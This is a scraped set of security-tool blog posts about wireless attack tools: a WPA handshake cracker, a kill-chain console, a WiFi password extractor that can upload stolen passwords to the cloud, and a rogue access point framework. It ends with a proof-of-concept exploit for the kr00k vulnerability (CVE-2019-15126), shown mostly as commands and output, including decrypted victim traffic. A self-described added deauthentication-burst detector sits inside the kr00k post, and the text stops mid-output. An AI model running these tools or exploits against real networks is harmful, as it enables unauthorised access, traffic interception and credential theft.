<strong>h4rpy</strong> provides a clean interface for automated <a href="https://www.kitploit.com/search/label/Cracking" target="_blank" title="cracking">cracking</a> of WPA/WPA2 PSK networks. <strong>h4rpy</strong> enables monitor mode on the selected <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> interface, scans the wireless space for access points, tries to capture the WPA/WPA2 4-way <a href="https://www.kitploit.com/search/label/Handshake" target="_blank" title="handshake">handshake</a> for the access point, and starts a dictionary attack on the handshake. It is also possible to send disassociate packets to clients associated with the access point.<br />
<a name='more'></a><br />
<span style="font-size: large;"><b>Installation:</b></span><br />
Installation consists of cloning the repo, running a script that installs the dependencies (<a href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="aircrack-ng framework">aircrack-ng framework</a> and <a href="https://code.launchpad.net/terminator/" rel="nofollow" target="_blank" title="Terminator">Terminator</a> are required in order to run <strong>h4rpy</strong>), and making <strong>h4rpy</strong> executable. The script only works with the apt package manager (Debian-based distributions).<br />
<pre><code># git clone https://github.com/MS-WEB-BN/h4rpy/
# cd h4rpy
# sudo bash config.sh
# sudo chmod +x h4rpy</code></pre>
<br />
<span style="font-size: large;"><b>Usage:</b></span><br />
To run h4rpy:<br />
<pre><code># sudo ./h4rpy</code></pre>
<strong>Top-left</strong>: Enabling monitor mode, <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> for access points (packet capturing of raw 802.11 frames);<br />
<strong>Top-right</strong>: Packet capturing on selected wireless network, capturing the WPA/WPA2 4-way handshake;<br />
<strong>Bottom-left</strong>: Sends disassociate packets to clients which are currently associated with a selected access point;<br />
<strong>Bottom-right</strong>: Dictionary attack on the captured WPA/WPA2 4-way handshake.<br />
<br />
<span style="font-size: large;"><b>Screenshots:</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-zgzClP_nR_k/X0wSj42WUEI/AAAAAAAATqo/L1MdDC0uJ2c1nnTsYBi4wuH7_Nj2LIbzgCNcBGAsYHQ/s1600/h4rpy_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-zgzClP_nR_k/X0wSj42WUEI/AAAAAAAATqo/L1MdDC0uJ2c1nnTsYBi4wuH7_Nj2LIbzgCNcBGAsYHQ/s640/h4rpy_1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s1600/h4rpy_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s640/h4rpy_2.png" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>Disclaimer:</b></span><br />
Any actions and/or activities done by using <strong>h4rpy</strong> are solely your responsibility. The misuse of <strong>h4rpy</strong> can result in criminal charges brought against the persons in question. The author will not be held responsible in the event any criminal charges be brought against any individuals misusing <strong>h4rpy</strong> to break the law.<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MS-WEB-BN/h4rpy" rel="nofollow" target="_blank" title="Download H4Rpy">Download H4Rpy</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-64775128090999008992020-09-01T17:30:00.000-04:002020-09-01T17:30:07.579-04:00Killchain - A Unified Console To Perform The "Kill Chain" Stages Of Attacks<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-L_rnju5D65I/X0v9wRi2hNI/AAAAAAAATpI/kufw_Xvy2rQuswwoQUeRCrd0NDdlEZiRgCNcBGAsYHQ/s1600/killchain2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="554" data-original-width="493" src="https://1.bp.blogspot.com/-L_rnju5D65I/X0v9wRi2hNI/AAAAAAAATpI/kufw_Xvy2rQuswwoQUeRCrd0NDdlEZiRgCNcBGAsYHQ/s1600/killchain2.png" /></a></div>
<br />
<br />
<b><span style="font-size: large;">What is “Kill Chain”?</span></b><br />
<blockquote>
<a href="https://en.wikipedia.org/wiki/Kill_chain" rel="nofollow">From Wikipedia</a>: The term kill chain was originally used as a military concept related
to the structure of an attack; consisting of target identification, force dispatch to
target, decision, order to attack the target, and finally the destruction of the target.</blockquote>
<ul>
<li><strong>Reconnaissance</strong> – Uses social engineering to find weaknesses in the target’s security
posture.</li>
<li><strong>Weaponization</strong> – Crafting attack tools for the target system.</li>
<li><strong>Delivery</strong> – Delivering the attack tools to the target system.</li>
<li><strong>Exploit</strong> – The malicious file, aimed at an application or operating system vulnerability on the
target system, is opened by the victim on the target system.</li>
<li><strong>Installation</strong> – Remote control program installed on target system.</li>
<li><strong>Command & Control</strong> – Successfully compromised hosts will create a C2 channel on
the Internet to establish a connection with the C2 server.</li>
<li><strong>Actions</strong> – After the preceding stages, the attacker continues to steal information
from the target system, undermines the integrity and availability of information, and
uses the controlled machine as a pivot to attack other machines, expanding the
sphere of influence.</li>
</ul>
<a name='more'></a><br />
<b>Dependent tool sets are:</b><br />
<ol>
<li> Tor -- For the console built-in <a href="https://github.com/ruped24/toriptables2" rel="nofollow" target="_blank" title="anonymizer">anonymizer</a>.<br />
</li>
<li> Set -- <a href="https://www.kitploit.com/search/label/Social-Engineer" target="_blank" title="Social-Engineer">Social-Engineer</a> Toolkit (SET), attacks against humans.<br />
</li>
<li> OpenVas -- <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> scanning and vulnerability management.<br />
</li>
<li> Veil-Evasion -- Generate <a href="https://www.kitploit.com/search/label/Metasploit" target="_blank" title="metasploit">metasploit</a> payloads that bypass anti-virus.<br />
</li>
<li> Websploit -- WebSploit Advanced MITM Framework.<br />
</li>
<li> Metasploit -- Executing exploit code against a target.<br />
</li>
<li> WiFite -- <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="Automated">Automated</a> wireless auditor, designed for Linux.</li>
</ol>
<br />
<span style="font-size: large;"><b><a href="https://github.com/ruped24/killchain/wiki/Kill-Chain-Setup#setting-up-your-kill-chain-environment" rel="nofollow" target="_blank" title="killchain Setup">killchain Setup</a></b></span><br />
<br />
<span style="font-size: large;"><b><a href="https://github.com/ruped24/tor_ip_switcher" rel="nofollow" target="_blank" title="killchain Add-on">killchain Add-on</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ruped24/killchain" rel="nofollow" target="_blank" title="Download Killchain">Download Killchain</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-62254131778561734282020-07-16T08:30:00.000-04:002020-07-16T08:30:03.576-04:00WiFi Passview v4.0 - An Open Source Batch Script Based WiFi Passview For Windows!<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-q75fs2gudPM/XwueDLlgvCI/AAAAAAAATFQ/SGvQWqclgQkL3az1pa5mYioQvkAHJAQiACNcBGAsYHQ/s1600/wifi-passview_8_wifi-passview-github-banner.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="304" data-original-width="1280" height="152" src="https://1.bp.blogspot.com/-q75fs2gudPM/XwueDLlgvCI/AAAAAAAATFQ/SGvQWqclgQkL3az1pa5mYioQvkAHJAQiACNcBGAsYHQ/s640/wifi-passview_8_wifi-passview-github-banner.jpeg" width="640" /></a></div>
<br />
<strong>WiFi Passview</strong> is an open-source batch script-based program that can recover your WiFi Password easily in seconds. This is for Windows OS only. Basically, this scripted program has the same function as other passview software such as webpassview and mailpassview. <a href="https://github.com/warengonzaga/wifi-passview/wiki" rel="nofollow" target="_blank" title="Visit Wiki">Visit Wiki</a><br />
<em><strong>Disclaimer</strong>: WiFi Passview is <strong>NOT</strong> designed for malicious use! Please use this program responsibly!</em><br />
<a name='more'></a><br />
<span style="font-size: large;"><b>How it Works</b></span><br />
Basically, this is the shortcut and batch scripted file version of a popular WiFi password manager viewing method using the command prompt. This is how it works...<br />
<div>
<pre><code>netsh wlan show profiles</code></pre>
</div>
When you use this tool, you are able to extract the WiFi <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> stored on the target machine in just seconds.<br />
To learn more <a href="https://github.com/warengonzaga/wifi-passview/wiki" rel="nofollow" target="_blank" title="visit Wiki">visit Wiki</a> page...<br />
<br />
<span style="font-size: large;"><b>Features</b></span><br />
This simple tool offers you the following features...<br />
<ul>
<li>Extract all available WiFi passwords stored on the target machine in just seconds.</li>
<li>Extract password from specific target SSID.</li>
<li>Save extracted passwords.</li>
<li>Additional options.</li>
<li>No manual reading of <strong><code>Key Content</code></strong>, the tool will do that for you!</li>
<li>No admin rights needed to run the program.</li>
<li>Standalone batch program.</li>
<li>Supports all languages.</li>
<li>Generate WLAN report. (requires admin privileges)</li>
<li>Upload collected passwords to the cloud. (powered by file.io api)</li>
<li>Customizable builds.</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
Download the repository and look for <strong><code>"wifi-passview-vX.X.X.bat"</code></strong> file and run it as ordinary <code>*.bat</code> file (<em>no need to run it as administrator</em>). All you have to do is to follow the on-screen instructions.<br />
Read the official blog on <strong><a href="https://warengonzaga.com/wifi-passview-for-windows-os" rel="nofollow" target="_blank" title="How to Use WiFi Passview">How to Use WiFi Passview</a></strong>.<br />
<em>Wanna use for WiFi Hacking? Visit this <a href="https://www.buymeacoffee.com/p/40225" rel="nofollow" target="_blank" title="exclusive post from the author">exclusive post from the author</a>.</em><br />
<br />
<span style="font-size: large;"><b>Screenshots</b></span><br />
Here's a screenshot of the program...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-lo7cv-XWAJw/XwueKkJ80JI/AAAAAAAATFU/aed7-2j0VoEKBR9lnzypq5282tLYiI4ZgCNcBGAsYHQ/s1600/wifi-passview_9_wifi-passview-v4.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="979" height="334" src="https://1.bp.blogspot.com/-lo7cv-XWAJw/XwueKkJ80JI/AAAAAAAATFU/aed7-2j0VoEKBR9lnzypq5282tLYiI4ZgCNcBGAsYHQ/s640/wifi-passview_9_wifi-passview-v4.gif" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>In Action</b></span><br />
Here's how this tool works...<br />
<br />
<div style="text-align: center;">
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/dYWuXBjMyVc" width="560"></iframe></div>
<br />
<div style="text-align: center;">
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/eu1DUgwP2wM" width="560"></iframe></div>
<br />
Don't forget to like, share, and subscribe to my channel!<br />
<br />
<span style="font-size: large;"><b>White Label / Personalize / Custom / Development</b></span><br />
<ul>
<li>Download the repository</li>
<li>Do <strong><code>"npm install"</code></strong> and <strong><code>"npm install gulp-cli -g && npm install gulp -D"</code></strong></li>
<li>After that, edit the <strong><code>"./src/config.json"</code></strong> file for your customization or personalization.</li>
<li>When you are satisfied, just do <strong><code>"gulp build"</code></strong> or <strong><code>"gulp"</code></strong> to initiate the building process.</li>
<li>If you want to reset the building process just do <strong><code>"gulp cleandev"</code></strong>.</li>
<li>If you are editing <strong><code>"./src/core.bat"</code></strong>, you can use <strong><code>"gulp test"</code></strong>; it is a combination of <strong><code>"gulp build"</code></strong> and <strong><code>"gulp cleandev"</code></strong>, so you can quickly quality-check the production build.</li>
<li>Do <strong><code>"gulp --tasks"</code></strong> to see all available <strong><code>"gulp"</code></strong> commands.</li>
</ul>
<br />
<span style="font-size: large;"><b>Premium Version</b></span><br />
Looking for the official <strong><code>"wifi-passview-vX.X.X.exe"</code></strong> version and wanna support the project?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9Zz_cMJ4mP0/XwueQXwaaxI/AAAAAAAATFY/zCN7bQ67YvUrWL69FhnUZg0z4qay5k03gCNcBGAsYHQ/s1600/wifi-passview_12_premium.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="954" height="339" src="https://1.bp.blogspot.com/-9Zz_cMJ4mP0/XwueQXwaaxI/AAAAAAAATFY/zCN7bQ67YvUrWL69FhnUZg0z4qay5k03gCNcBGAsYHQ/s640/wifi-passview_12_premium.jpeg" width="640" /></a></div>
<br />
<span style="font-size: large;"><b>FAQs</b></span><br />
<strong>Q</strong>: Why don't you use the built-in <code>netsh wlan</code> export command?<br />
<blockquote>
<em>I'm aware of that command; the only reason I use <code>findstr</code> instead of that command is to make the tool more user-level, so that it does not require any admin rights. For example, if you are about to use the tool on a machine that you don't own, then you're not able to use the tool. Got the idea? If the tool does not require admin rights, then we can avoid the UAC prompt and use the tool more efficiently. The command <code>netsh wlan show profiles</code> does not require admin rights; that's why we can still use it and <a href="https://www.kitploit.com/search/label/Capture" target="_blank" title="capture">capture</a> the data and save it to a file using the <code>findstr</code> command. Brilliant?</em></blockquote>
Visit <a href="https://github.com/warengonzaga/wifi-passview/wiki/Frequently-Asked-Questions" rel="nofollow" target="_blank" title="FAQ section">FAQ section</a> for more information.<br />
<br />
<span style="font-size: large;"><b>Contributing</b></span><br />
Contributions are welcome, create a pull request to <strong>dev</strong> branch of this repo and I will review your code.<br />
<br />
<span style="font-size: large;"><b>Issues</b></span><br />
If you're facing a problem using WiFi Passview, please let me know by creating an issue in this GitHub repository. I'm happy to help you! Don't forget to provide some <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshots</a> or error logs of it!<br />
<br />
<span style="font-size: large;"><b>To Do</b></span><br />
<ul>
<li>Extract WiFi Password Across Network (experimental)</li>
<li>More... (have suggestions? let me know!)</li>
</ul>
<br />
<span style="font-size: large;"><b>Supporters and Backers</b></span><br />
<ul>
<li>ernest_bigelow, nanantakeshi, kerry_howell</li>
</ul>
Wanna see your name here? <a href="https://www.buymeacoffee.com/warengonzaga" rel="nofollow" target="_blank" title="Just buy me a coffee">Just buy me a coffee</a>!<br />
<br />
<span style="font-size: large;"><b>License</b></span><br />
WiFi Passview is licensed under GNU General Public License v3 - <a href="https://opensource.org/licenses/GPL-3.0" rel="nofollow" target="_blank" title="https://opensource.org/licenses/GPL-3.0">https://opensource.org/licenses/GPL-3.0</a><br />
<br />
<span style="font-size: large;"><b>Author</b></span><br />
This project is created by <strong>Waren Gonzaga</strong> for educational purposes.<br />
<ul>
<li><strong>Facebook:</strong> <a href="https://facebook.com/warengonzagaofficial" rel="nofollow" target="_blank" title="https://facebook.com/warengonzagaofficial">https://facebook.com/warengonzagaofficial</a></li>
<li><strong>Twitter:</strong> <a href="https://twitter.com/warengonzaga" rel="nofollow" target="_blank" title="https://twitter.com/warengonzaga">https://twitter.com/warengonzaga</a></li>
<li><strong>Website:</strong> <a href="https://warengonzaga.com/" rel="nofollow" target="_blank" title="https://warengonzaga.com">https://warengonzaga.com</a></li>
<li><strong>Email:</strong> dev(at)warengonzaga[.]com</li>
</ul>
&lt;/&gt; with &lt;3 by <strong>Waren Gonzaga</strong><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/warengonzaga/wifi-passview" rel="nofollow" target="_blank" title="Download Wifi-Passview">Download Wifi-Passview</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>Wifipumpkin3 - Powerful Framework For Rogue Access Point Attack</b></span> (2020-05-11)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-DywqNOossUI/XqZSlwn3hQI/AAAAAAAASec/-3Eoz17HFYkRG5tMtwPH86CBVc_V56x-gCNcBGAsYHQ/s1600/wifipumpkin3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="360" src="https://1.bp.blogspot.com/-DywqNOossUI/XqZSlwn3hQI/AAAAAAAASec/-3Eoz17HFYkRG5tMtwPH86CBVc_V56x-gCNcBGAsYHQ/s640/wifipumpkin3.jpeg" width="640" /></a></div>
<br />
<strong>wifipumpkin3</strong> is a powerful framework for rogue access point attacks, written in Python, that allows security researchers, red teamers and <a href="https://www.kitploit.com/search/label/Reverse" target="_blank" title="reverse">reverse</a> engineers to mount a <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network to conduct a <a href="https://www.kitploit.com/search/label/Man-in-the-Middle" target="_blank" title="man-in-the-middle">man-in-the-middle</a> attack.<br />
<span style="font-size: large;"><b>Main Features</b></span><br />
<ul>
<li>Rogue access point attack</li>
<li>Man-in-the-middle attack</li>
<li>Rogue <strong>DNS Server</strong></li>
<li>Captive portal attack (captiveflask)</li>
<li><strong>Intercept</strong>, inspect, modify and replay <strong>web traffic</strong></li>
<li><strong>WiFi</strong> networks scanning</li>
<li><strong>DNS</strong> monitoring service</li>
<li>Credentials harvesting</li>
<li>Transparent Proxies</li>
<li>LLMNR, NBT-NS and MDNS <a href="https://www.kitploit.com/search/label/Poisoner" target="_blank" title="poisoner">poisoner</a> (<a href="https://github.com/skelsec/Responder3" rel="nofollow" target="_blank" title="Responder3">Responder3</a>)</li>
<li>and <strong>more</strong>!</li>
</ul>
<br />
<span style="font-size: large;"><b>Supported platforms</b></span><br />
<ul>
<li><strong>Python</strong>: you need <strong>Python 3.7 or later</strong> to run Wp3.</li>
</ul>
<blockquote>NOTE: By default, Wp3 requires hostapd to be installed.</blockquote>
<ul>
<li><strong>Operating System</strong>: <ul>
<li>a recent version of Linux (we tested on <strong>Ubuntu 18.04 LTS</strong>);</li>
<li>please note: <strong>Windows</strong> is not <strong>supported</strong>.</li>
</ul>
</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation & Documentation</b></span><br />
Learn more about using <a href="https://wifipumpkin3.github.io/" rel="nofollow" target="_blank" title="wp3 on the official site!">wp3 on the official site!</a><br />
<ul>
<li><a href="https://wifipumpkin3.github.io/docs/getting-started" rel="nofollow" target="_blank" title="Getting Started">Getting Started</a></li>
<li><a href="https://wifipumpkin3.github.io/docs/getting-started#installation" rel="nofollow" target="_blank" title="Installation">Installation</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Community</b></span><br />
On Discord: <a href="https://discord.gg/jywYskR" rel="nofollow" target="_blank" title="https://discord.gg/jywYskR">https://discord.gg/jywYskR</a><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/P0cL4bs/wifipumpkin3" rel="nofollow" target="_blank" title="Download Wifipumpkin3">Download Wifipumpkin3</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability</b></span> (2020-03-30)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iVX1skjBQ28/Xn_3dtthSJI/AAAAAAAASHQ/dz3m7vebGd02JRx91Il0HoDb6zWQTe6lACNcBGAsYHQ/s1600/r00kie-kr00kie_1_rookie.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="547" data-original-width="864" height="404" src="https://1.bp.blogspot.com/-iVX1skjBQ28/Xn_3dtthSJI/AAAAAAAASHQ/dz3m7vebGd02JRx91Il0HoDb6zWQTe6lACNcBGAsYHQ/s640/r00kie-kr00kie_1_rookie.jpeg" width="640" /></a></div>
<span style="font-size: large;"><b>Disclaimer</b></span><br />
This is a PoC exploit for the CVE-2019-15126 <strong>kr00k</strong> vulnerability.<br />
<em><strong>This project is intended for educational purposes only and cannot be used for law violation or personal gain.<br />The author of this project is not responsible for any possible harm caused by the materials.</strong></em><br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
To use these scripts, you will need a WiFi card supporting active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n), which we used to develop and test the code. We have tested this PoC on <strong>Kali Linux</strong>.<br />
<span style="font-size: large;"><b>Installation</b></span><br />
<pre><code># clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt</code></pre>
<br />
<span style="font-size: large;"><b>How to use</b></span><br />
<br />
<b>Script: <a href="https://github.com/hexway/r00kie-kr00kie/blob/master/r00kie-kr00kie.py" rel="nofollow" target="_blank" title="r00kie-kr00kie.py">r00kie-kr00kie.py</a></b><br />
This is the main exploit file that implements the <strong>kr00k</strong> attack.<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -h
usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]
PoC of CVE-2019-15126 kr00k vulnerability
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set number of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output</code></pre>
</div>
In order to start an attack, you need to know the <em>BSSID</em> of the access point, its <em>channel</em> and the <em>MAC address</em> of the victim. You can find them using the <code>airodump-ng wlan0</code> utility.<br />
Run the exploit:<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0xa649
###[ DNS ]###
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
\options \
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0x104b
###[ DNS ]###
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None</code></pre>
</div>
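The deauthentication bursts the PoC sends before each capture (five frames per iteration, five seconds apart in the run above) are what a wireless IDS sensor would flag. The detector below is an added defensive example, not part of the r00kie-kr00kie project; its frame records are constructed from the addresses and counts in the run above, with a simplified dict layout (ts, type, subtype, addr1, addr2) assumed for the sensor's frame feed.<br />

```python
"""Deauthentication-burst detector: the wireless-IDS view of the kr00k PoC's first step.

Frame records are plain dicts (an assumed, simplified layout): ts in integer milliseconds,
802.11 frame type/subtype, addr1 = receiver, addr2 = transmitter.
"""
from collections import defaultdict, deque

MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12     # 802.11 management subtype 0xC (Deauthentication)
DISASSOC_SUBTYPE = 10   # 802.11 management subtype 0xA (Disassociation)


def deauth_burst_alerts(frames, threshold=5, window_ms=10_000):
    """Alert when >= threshold deauth/disassoc frames for one transmitter->receiver pair
    fall within window_ms. The same pair is re-alerted only after window_ms has elapsed,
    so a sustained flood yields one alert per window rather than one per frame."""
    recent = defaultdict(deque)   # (transmitter, receiver) -> timestamps still inside the window
    last_alert = {}
    alerts = []
    for f in sorted(frames, key=lambda x: x["ts"]):
        if f["type"] != MGMT_TYPE or f["subtype"] not in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            continue
        key = (f["addr2"].lower(), f["addr1"].lower())
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window_ms:   # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and f["ts"] - last_alert.get(key, -window_ms) >= window_ms:
            last_alert[key] = f["ts"]
            alerts.append({"transmitter": key[0], "receiver": key[1],
                           "ts": f["ts"], "count": len(q)})
    return alerts


def build_sample_frames():
    """Constructed capture (not real traffic): three bursts of five deauths, spoofed as
    coming from the AP BSSID to the client exactly as in the PoC run, plus beacons and one
    isolated deauth from an unrelated (placeholder) BSSID that must not alert."""
    ap, client = "D4:38:9C:82:23:7A", "88:C9:D0:FB:88:D1"
    frames = []
    for burst in range(3):                  # bursts 5 s apart, the PoC's default delay
        for i in range(5):                  # 5 frames per burst, the PoC's default number
            frames.append({"ts": burst * 5000 + i * 10, "type": MGMT_TYPE,
                           "subtype": DEAUTH_SUBTYPE, "addr1": client, "addr2": ap})
    for ts in range(0, 15000, 1000):        # normal beacons, ignored by the detector
        frames.append({"ts": ts, "type": MGMT_TYPE, "subtype": 8,
                       "addr1": "ff:ff:ff:ff:ff:ff", "addr2": ap})
    frames.append({"ts": 7000, "type": MGMT_TYPE, "subtype": DEAUTH_SUBTYPE,
                   "addr1": client, "addr2": "00:11:22:33:44:55"})   # lone, legitimate deauth
    return frames


if __name__ == "__main__":
    for a in deauth_burst_alerts(build_sample_frames()):
        print(f"[!] deauth burst: {a['count']} frames {a['transmitter']} -> {a['receiver']} at t={a['ts']} ms")
```

The first burst trips the threshold on its fifth frame; the second burst is suppressed because it falls inside the alert window, and the third re-alerts with all frames still in the window counted.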
Also, if you have already intercepted traffic (a pcap file) after the <code>kr00k</code> attack, you can decrypt it:<br />
<div>
<pre><code>->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap
/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ \ $$| $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ \ $$| $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ |__/ \______/ \______/ |__/ \__/|__/ \_______/
